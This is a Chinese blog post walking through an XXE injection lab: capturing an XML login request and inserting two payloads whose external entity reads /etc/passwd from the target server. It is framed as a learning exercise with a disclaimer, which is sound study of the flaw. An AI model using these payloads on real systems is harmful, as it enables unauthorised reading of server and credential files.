漏洞复现之xxe漏洞

向右看齐 2022-08-29 10:51 414阅读 0赞

文章目录

    • XXE-基础实验
      • 实验内容
      • 实验步骤
        • 1.访问目标进行注入攻击
        • 2.尝试进行登录,并进行抓包
        • 3.根据xxe注入漏洞,构造payloa
      • 免责声明

XXE-基础实验

实验内容

XXE(XML注入)

实验步骤

1.访问目标进行注入攻击

访问目标IP:172.16.12.2,看到以下页面
在这里插入图片描述
在这里插入图片描述

2.尝试进行登录,并进行抓包

在数据包中发送的用户名/密码是以post形式发送的,并且格式很像xml文档

在这里插入图片描述

3.根据xxe注入漏洞,构造payloa

只需将payload输出在username里面就行

payload:

  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <!DOCTYPE copyright [<!ENTITY whoami SYSTEM "file:///etc//passwd">
  3. ]>
  4. <user>
  5.   <username>&whoami;</username>
  6.   <password>123.com</password>
  7. </user>

在这里插入图片描述

payload

  1. <?xml version="1.0" ?>
  2. <!DOCTYPE r [
  3. <!ELEMENT r ANY >
  4. <!ENTITY sp SYSTEM "file:///etc/passwd">
  5. ]>
  6. <root> 
  7.     <username>&sp;</username>
  8.     <password>123.com</password>
  9. </root>

在这里插入图片描述

免责声明

本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!
由于使用不当造成的后果上传者概不负责!

发表评论

表情:
评论列表 (有 0 条评论,414人围观)

还没有评论,来说两句吧...

相关阅读

    相关 fastjson 漏洞

    可能从fastjson“盘古开天地”开始讲,因为我对序列化 反序列化还有那些组件非常不熟悉(谁不搞开发会对这些熟悉)也算复习一下java知识吧,之前好像我自己大二学习java序

    系统管理员系统管理员/ 0/ 109 阅读

    相关 XSS漏洞

    XSS漏洞复现 实验环境DVWA > XSS(cross site script) 跨站脚本。属于代码执行的一种,这里执行的是前端代码,一般是javascript代码。

    迷南。迷南。/ 0/ 652 阅读